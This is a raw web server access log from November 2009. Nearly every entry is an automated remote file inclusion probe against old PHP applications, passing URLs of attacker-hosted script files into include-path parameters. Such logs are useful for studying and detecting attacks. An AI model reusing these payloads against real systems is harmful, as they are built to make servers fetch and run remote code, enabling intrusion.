140.113.223.66 - - [12/Nov/2009:01:56:27 -0600] "GET //include/mail.inc.php?skin_board_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 304 "-""Mozilla/5.0"
140.113.223.66 - - [12/Nov/2009:01:56:35 -0600] "GET /logs//include/mail.inc.php?skin_board_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 309 "-""Mozilla/5.0"
140.113.223.66 - - [12/Nov/2009:01:56:47 -0600] "GET /logs/access_log.1252022400//include/mail.inc.php?skin_board_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 331 "-""Mozilla/5.0"
140.113.223.66 - - [12/Nov/2009:01:56:53 -0600] "GET /logs/access_log.1251676800//include/mail.inc.php?skin_board_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 331 "-""Mozilla/5.0"
119.69.199.43 - - [12/Nov/2009:01:58:41 -0600] "GET /logs/access_log.1252108800//skin/rosun_comm2_gallery/setup.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
119.69.199.43 - - [12/Nov/2009:01:58:41 -0600] "GET /logs//skin/rosun_comm2_gallery/setup.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
119.69.199.43 - - [12/Nov/2009:01:58:41 -0600] "GET //skin/rosun_comm2_gallery/setup.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
209.92.156.53 - - [12/Nov/2009:01:59:16 -0600] "GET //coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
209.92.156.53 - - [12/Nov/2009:01:59:16 -0600] "GET /logs//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
209.92.156.53 - - [12/Nov/2009:01:59:16 -0600] "GET /logs/access_log.1246406400//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
209.92.156.53 - - [12/Nov/2009:01:59:33 -0600] "GET /logs/access_log.1242950400//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
209.92.156.53 - - [12/Nov/2009:01:59:33 -0600] "GET /logs/access_log.1239926400//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
209.92.156.53 - - [12/Nov/2009:01:59:33 -0600] "GET /logs/access_log.1246838400//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
209.92.156.53 - - [12/Nov/2009:01:59:33 -0600] "GET /logs/access_log.1250294400//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
209.92.156.53 - - [12/Nov/2009:01:59:33 -0600] "GET /logs/access_log.1245369600//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
209.92.156.53 - - [12/Nov/2009:01:59:47 -0600] "GET /logs/access_log.1250553600//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
209.92.156.53 - - [12/Nov/2009:01:59:47 -0600] "GET /logs/access_log.1247961600//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
209.92.156.53 - - [12/Nov/2009:01:59:47 -0600] "GET /logs/access_log.1251158400//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
209.92.156.53 - - [12/Nov/2009:01:59:47 -0600] "GET /logs/access_log.1240876800//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
209.92.156.53 - - [12/Nov/2009:01:59:47 -0600] "GET /logs/access_log.1252368000//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
209.92.156.53 - - [12/Nov/2009:01:59:47 -0600] "GET /logs/access_log.1250640000//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
209.92.156.53 - - [12/Nov/2009:01:59:48 -0600] "GET /logs/access_log.1251676800//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
209.92.156.53 - - [12/Nov/2009:01:59:49 -0600] "GET /logs/access_log.1251072000//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
82.41.129.203 - - [12/Nov/2009:01:59:50 -0600] "GET /index_principal.php?pagina=http://www.nopaste.pl/Source/hbb.txt?&mode=id HTTP/1.1" 404 302 "-""-"
85.25.94.14 - - [12/Nov/2009:02:00:49 -0600] "GET //administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
85.25.94.14 - - [12/Nov/2009:02:00:49 -0600] "GET /logs//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
209.92.156.53 - - [12/Nov/2009:02:00:57 -0600] "GET /logs/access_log.1242864000//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
82.41.129.203 - - [12/Nov/2009:02:01:21 -0600] "GET /logs/index_principal.php?pagina=http://www.nopaste.pl/Source/hbb.txt?&mode=id HTTP/1.1" 404 307 "-""-"
116.127.121.116 - - [12/Nov/2009:02:01:22 -0600] "GET /logs//bbs/skin/zero_vote/setup.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
116.127.121.116 - - [12/Nov/2009:02:01:22 -0600] "GET //bbs/skin/zero_vote/setup.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
116.127.121.116 - - [12/Nov/2009:02:01:22 -0600] "GET /logs/access_log.1234224000//bbs/skin/zero_vote/setup.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
116.127.121.116 - - [12/Nov/2009:02:01:22 -0600] "GET /logs/access_log.1231718400//bbs/skin/zero_vote/setup.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
209.92.156.53 - - [12/Nov/2009:02:01:35 -0600] "GET /logs/access_log.1244592000//paginedinamiche/main.php?pagina=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
209.92.156.53 - - [12/Nov/2009:02:01:35 -0600] "GET /logs//paginedinamiche/main.php?pagina=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
209.92.156.53 - - [12/Nov/2009:02:01:35 -0600] "GET //paginedinamiche/main.php?pagina=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
65.55.106.204 - - [12/Nov/2009:02:01:55 -0600] "GET /logs/access_log.1192406400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.92.156.53 - - [12/Nov/2009:02:01:59 -0600] "GET /logs//paginedinamiche/main.php?pagina=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
209.92.156.53 - - [12/Nov/2009:02:01:59 -0600] "GET //paginedinamiche/main.php?pagina=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
209.92.156.53 - - [12/Nov/2009:02:02:00 -0600] "GET /logs/access_log.1244592000//paginedinamiche/main.php?pagina=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
216.86.146.15 - - [12/Nov/2009:02:03:25 -0600] "GET /PHPDJ_v05/dj/djpage.php?page=http://www.nopaste.pl/Source/hbb.txt?&mode=id HTTP/1.1" 404 306 "-""-"
209.92.156.53 - - [12/Nov/2009:02:03:30 -0600] "GET /logs/access_log.1241568000//paginedinamiche/main.php?pagina=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
66.163.197.88 - - [12/Nov/2009:02:03:44 -0600] "GET /logs/access_log.1239408000/index.php?conteudo=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.163.197.88 - - [12/Nov/2009:02:03:44 -0600] "GET /index.php?conteudo=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
66.163.197.88 - - [12/Nov/2009:02:03:44 -0600] "GET /logs/index.php?conteudo=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
66.163.197.88 - - [12/Nov/2009:02:03:49 -0600] "GET /logs/access_log.1240963200/index.php?conteudo=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
63.174.244.10 - - [12/Nov/2009:02:05:44 -0600] "GET /logs/access_log.1237075200//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
63.174.244.10 - - [12/Nov/2009:02:05:44 -0600] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
63.174.244.10 - - [12/Nov/2009:02:05:44 -0600] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
83.2.224.2 - - [12/Nov/2009:02:08:06 -0600] "GET /index_principal.php?pagina=http://www.nopaste.pl/Source/hbb.txt?&mode=id HTTP/1.1" 404 302 "-""-"
85.25.94.14 - - [12/Nov/2009:02:09:52 -0600] "GET /logs/access_log.1228608000//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
85.25.94.14 - - [12/Nov/2009:02:09:52 -0600] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
85.25.94.14 - - [12/Nov/2009:02:09:52 -0600] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
59.24.49.35 - - [12/Nov/2009:02:10:19 -0600] "GET /phphtml.php?htmlclass_path=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
59.24.49.35 - - [12/Nov/2009:02:10:19 -0600] "GET /logs/phphtml.php?htmlclass_path=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
59.24.49.35 - - [12/Nov/2009:02:10:19 -0600] "GET /logs/access_log.1248220800/phphtml.php?htmlclass_path=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
59.24.49.35 - - [12/Nov/2009:02:10:50 -0600] "GET /logs/access_log.1245715200/phphtml.php?htmlclass_path=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
59.24.49.35 - - [12/Nov/2009:02:11:11 -0600] "GET /phphtml.php?htmlclass_path=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
59.24.49.35 - - [12/Nov/2009:02:11:11 -0600] "GET /logs/phphtml.php?htmlclass_path=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
59.24.49.35 - - [12/Nov/2009:02:11:11 -0600] "GET /logs/access_log.1248220800/phphtml.php?htmlclass_path=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
59.24.49.35 - - [12/Nov/2009:02:11:32 -0600] "GET /logs/access_log.1245715200/phphtml.php?htmlclass_path=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.137.0.63 - - [12/Nov/2009:02:12:26 -0600] "GET /logs/errors.php?error=http://www.nopaste.pl/Source/hbb.txt?&mode=id HTTP/1.1" 404 298 "-""-"
65.55.107.180 - - [12/Nov/2009:02:14:25 -0600] "GET /logs/access_log.1155772800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.2.224.2 - - [12/Nov/2009:02:14:33 -0600] "GET /logs/index_principal.php?pagina=http://www.nopaste.pl/Source/hbb.txt?&mode=id HTTP/1.1" 404 307 "-""-"
66.163.197.88 - - [12/Nov/2009:02:14:39 -0600] "GET /logs/access_log.1233964800//?sIncPath=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
66.163.197.88 - - [12/Nov/2009:02:14:39 -0600] "GET //?sIncPath=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
66.163.197.88 - - [12/Nov/2009:02:14:40 -0600] "GET /logs//?sIncPath=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 200 212471 "-""Mozilla/5.0"
85.25.94.14 - - [12/Nov/2009:02:14:41 -0600] "GET /logs/access_log.1231372800//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
66.163.197.88 - - [12/Nov/2009:02:15:11 -0600] "GET /logs/access_log.1239753600//?sIncPath=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
85.25.94.14 - - [12/Nov/2009:02:15:13 -0600] "GET /logs/access_log.1231459200//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
62.141.47.10 - - [12/Nov/2009:02:16:02 -0600] "GET /logs/access_log.1239062400//admin/spaw/spaw_control.class.php?spaw_root=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
62.141.47.10 - - [12/Nov/2009:02:16:02 -0600] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
62.141.47.10 - - [12/Nov/2009:02:16:02 -0600] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
85.25.94.14 - - [12/Nov/2009:02:16:06 -0600] "GET /logs/access_log.1228608000%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
124.138.172.3 - - [12/Nov/2009:02:17:05 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
124.138.172.3 - - [12/Nov/2009:02:17:05 -0600] "GET /logs/access_log.1231718400//skin/zero_vote/error.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
124.138.172.3 - - [12/Nov/2009:02:17:05 -0600] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
124.138.172.3 - - [12/Nov/2009:02:17:05 -0600] "GET //skin/zero_vote/error.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
63.174.244.10 - - [12/Nov/2009:02:17:58 -0600] "GET /logs/access_log.1235347200//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
210.115.180.221 - - [12/Nov/2009:02:18:07 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
210.115.180.221 - - [12/Nov/2009:02:18:07 -0600] "GET //skin/zero_vote/error.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
210.115.180.221 - - [12/Nov/2009:02:18:07 -0600] "GET /logs/access_log.1231718400//skin/zero_vote/error.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
210.115.180.221 - - [12/Nov/2009:02:18:07 -0600] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
124.0.143.66 - - [12/Nov/2009:02:18:39 -0600] "GET /logs/access_log.1231718400//skin/zero_vote/error.php?dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
124.0.143.66 - - [12/Nov/2009:02:18:39 -0600] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
124.0.143.66 - - [12/Nov/2009:02:18:39 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
124.0.143.66 - - [12/Nov/2009:02:18:39 -0600] "GET //skin/zero_vote/error.php?dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
124.0.143.66 - - [12/Nov/2009:02:18:54 -0600] "GET //skin/zero_vote/error.php?dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
124.0.143.66 - - [12/Nov/2009:02:18:54 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
124.0.143.66 - - [12/Nov/2009:02:18:54 -0600] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
124.0.143.66 - - [12/Nov/2009:02:18:54 -0600] "GET /logs/access_log.1231718400//skin/zero_vote/error.php?dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
119.69.199.43 - - [12/Nov/2009:02:19:04 -0600] "GET /logs//setup.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
119.69.199.43 - - [12/Nov/2009:02:19:04 -0600] "GET /logs/access_log.1250035200//setup.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
119.69.199.43 - - [12/Nov/2009:02:19:04 -0600] "GET //setup.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
210.115.180.221 - - [12/Nov/2009:02:19:11 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
210.115.180.221 - - [12/Nov/2009:02:19:11 -0600] "GET //skin/zero_vote/error.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
210.115.180.221 - - [12/Nov/2009:02:19:11 -0600] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
210.115.180.221 - - [12/Nov/2009:02:19:11 -0600] "GET /logs/access_log.1231718400//skin/zero_vote/error.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
119.69.199.43 - - [12/Nov/2009:02:19:30 -0600] "GET /logs/access_log.1251936000//setup.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.2.224.2 - - [12/Nov/2009:02:20:08 -0600] "GET //php/init.poll.php?include_class=http://www.nopaste.pl/Source/hbb.txt?&mode=id HTTP/1.1" 404 301 "-""-"
59.24.49.35 - - [12/Nov/2009:02:20:48 -0600] "GET /logs/access_log.1251244800//phpsecurityadmin/include/logout.php?PSA_PATH=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
59.24.49.35 - - [12/Nov/2009:02:20:49 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
59.24.49.35 - - [12/Nov/2009:02:20:49 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
59.24.49.35 - - [12/Nov/2009:02:21:03 -0600] "GET /logs/access_log.1249776000//phpsecurityadmin/include/logout.php?PSA_PATH=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
59.24.49.35 - - [12/Nov/2009:02:21:12 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
59.24.49.35 - - [12/Nov/2009:02:21:13 -0600] "GET /logs/access_log.1249776000//phpsecurityadmin/include/logout.php?PSA_PATH=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
59.24.49.35 - - [12/Nov/2009:02:21:13 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
59.24.49.35 - - [12/Nov/2009:02:21:13 -0600] "GET /logs/access_log.1251244800//phpsecurityadmin/include/logout.php?PSA_PATH=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
204.202.2.23 - - [12/Nov/2009:02:22:12 -0600] "GET //bbs//include/mail.inc.php?skin_board_path=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
204.202.2.23 - - [12/Nov/2009:02:22:12 -0600] "GET /logs/access_log.1253491200//bbs//include/mail.inc.php?skin_board_path=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
204.202.2.23 - - [12/Nov/2009:02:22:12 -0600] "GET /logs/access_log.1250726400//bbs//include/mail.inc.php?skin_board_path=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
204.202.2.23 - - [12/Nov/2009:02:22:12 -0600] "GET /logs//bbs//include/mail.inc.php?skin_board_path=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
85.214.74.222 - - [12/Nov/2009:02:22:24 -0600] "GET /logs//bbs/skin/lyh_white_board/setup.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
85.214.74.222 - - [12/Nov/2009:02:22:24 -0600] "GET //bbs/skin/lyh_white_board/setup.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
85.214.74.222 - - [12/Nov/2009:02:22:25 -0600] "GET /logs/access_log.1249171200//bbs/skin/lyh_white_board/setup.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
211.47.69.100 - - [12/Nov/2009:02:24:05 -0600] "GET //administrator/components/com_joomlaxplorer/joomlaxplorer.init.php?mosConfig_absolute_path=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
211.47.69.100 - - [12/Nov/2009:02:24:05 -0600] "GET /logs//administrator/components/com_joomlaxplorer/joomlaxplorer.init.php?mosConfig_absolute_path=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
211.47.69.100 - - [12/Nov/2009:02:24:05 -0600] "GET /logs/access_log.1252886400//administrator/components/com_joomlaxplorer/joomlaxplorer.init.php?mosConfig_absolute_path=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 376 "-""Mozilla/5.0"
211.47.69.100 - - [12/Nov/2009:02:24:11 -0600] "GET /logs/access_log.1243382400//administrator/components/com_joomlaxplorer/joomlaxplorer.init.php?mosConfig_absolute_path=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 376 "-""Mozilla/5.0"
65.55.106.132 - - [12/Nov/2009:02:24:55 -0600] "GET /logs/access_log.1189468800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.205.103.171 - - [12/Nov/2009:02:25:50 -0600] "GET /logs/access_log.1238112000//allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://flateen.com/.../id1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
67.205.103.171 - - [12/Nov/2009:02:25:50 -0600] "GET //allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://flateen.com/.../id1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
67.205.103.171 - - [12/Nov/2009:02:25:58 -0600] "GET /logs//allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://flateen.com/.../id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
67.205.103.171 - - [12/Nov/2009:02:25:58 -0600] "GET /logs/access_log.1241568000//allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://flateen.com/.../id1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
91.121.28.22 - - [12/Nov/2009:02:30:01 -0600] "GET //puyo12/www/bbs/skin/ggambo7002_gallery/setup.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
91.121.28.22 - - [12/Nov/2009:02:30:01 -0600] "GET /logs//puyo12/www/bbs/skin/ggambo7002_gallery/setup.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
91.121.28.22 - - [12/Nov/2009:02:30:01 -0600] "GET /logs/access_log.1249171200//puyo12/www/bbs/skin/ggambo7002_gallery/setup.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
